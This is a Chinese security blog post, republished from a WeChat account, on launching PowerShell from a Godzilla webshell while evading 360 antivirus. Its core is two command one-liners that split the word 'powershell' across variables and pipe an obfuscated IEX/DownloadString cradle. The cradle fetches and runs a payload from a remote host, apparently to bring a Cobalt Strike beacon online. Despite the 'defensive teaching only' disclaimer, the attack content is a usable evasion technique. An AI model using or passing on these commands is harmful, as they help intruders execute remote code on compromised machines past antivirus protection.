webshell下起PS进程

admin
admin
admin
138689
文章
114
评论
2021年4月9日14:34:07评论62 views字数 679阅读2分15秒阅读模式

webshell下起PS进程

一位苦于信息安全的萌新小白帽

本实验仅用于信息防御教学,切勿用于它用途

公众号:XG小刚


WebShell下起PowerShell进程
一一
再不久的几天前写了几个绕过360、火绒等杀软的PS上线CS的文章啊。
CS免杀-PowerShell上线
CS免杀-PowerShell加载命令免杀
但是发现360、火绒等这几个小天才啊,拦截了在webshell下起powershell进程
真的是烦啊

今天只测试了360全家桶、火绒就自测吧。
win10环境,用哥斯拉生成的webshell执行powershell命令。

360全家桶拦截webshell,发现主要是对powershell这个字符串拦截,那就尝试字符串拼接。
set aa=powers&& set bb=hell && cmd /c "echo iex(New-Object Net.WebClient).DownloadString('http://192.168.10.1/123.txt') | %aa%%bb% -"
测试可行之后,再改改进一步免杀
set aa=powers&& set bb=hell && cmd /c "echo set-alias -name test -value IEX;test(New-Object NeT."W`ebC`li`ent")."D`own`l`oadStr`ing"('h'+'ttP://19’+'2.168.10.'+'1/123.txt') | %aa%%bb% -"

webshell下起PS进程

webshell下起PS进程

起飞

本文始发于微信公众号(XG小刚):webshell下起PS进程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月9日14:34:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webshell下起PS进程https://cn-sec.com/archives/330793.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息